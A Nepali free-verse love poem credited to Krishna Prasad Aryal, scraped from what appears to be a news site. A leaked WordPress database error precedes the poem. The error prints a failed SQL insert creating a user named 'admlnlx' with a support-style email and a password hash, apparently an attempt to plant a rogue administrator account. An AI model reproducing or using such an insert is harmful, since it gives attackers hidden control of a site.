WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6PR8eFT8tqFYluaVaSXvY2vL9924b1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-03-01 23:05:47', '', 'admlnlx', 'admlnlx')
–कृष्ण प्रसाद अर्याल
तिमीले होइन,
तिम्रो मस्तिष्कले पनि होइन
तिम्रो मनले मात्र पनि होइन
तिम्रो पैतालाले पनि निदाएको बेला
जुन छातीमाथि कुल्चिएको सपना देख्छ
त्यो छातीको मालिक म हुँ ।
तिम्रो मनको अन्तिम बेन्चमा
बसेर होहल्ला मच्चाउने
अराजक विद्यार्थी म नै हुँ
जसले आफ्नै जिन्दगीका
पानामा गुलावको चित्र बनाएर
तिम्रो मनको भित्तामा टास्दथ्यो ।
तिम्रो मनको दूर क्षितिजमा पुगेर पनि
तिम्रै जीवनमा रङ्गीन हाँसोका किरण छरेर
आफ्नो जिन्दगीको रणबाट भाग्न आँटेको
त्यो घाम मेरै आँखा हो।
जसलाई आजसम्म देख्न नपाएको
मेरै अर्को आँखा तिमीले दिएको
चोटको गहिराइमा अस्तायो ।
म त्यो बेकामे घडी हुँ
जसको छोटो काँटाचाहिँ हराइसकेको छ
केवल अज्ञात मिनेटहरू
जोड(जोड आवाज गरेर
एउटा मिनेटमात्र बताउने घडी बाँचिरहेछ।
केही चीज रङ्गीन भएर पनि रङ्गहिन लाग्दछन्।
जस्तो (रङ पोत्नेले लगाएको कपडा
केही चीज रङ्ग्याएपछि कुरुप देखिन्छन्)
जस्तो सरको सेतो कमिज
केही चीज दाग लागिसकेपछि चन्द्रमा हुनबाट बञ्चित हुन्छन्
जस्तो तिमी
सबैलाई थाहा छ चन्द्रमा कसैको होइन
एउटा बाठो मान्छेले
श्वेत कमलको शिरमा रातो दाग लगाएर
चन्द्रमा हुनबाट बञ्चित गराएर आफ्नो बनायो
तर त्यो मान्छे म थिइनँ ।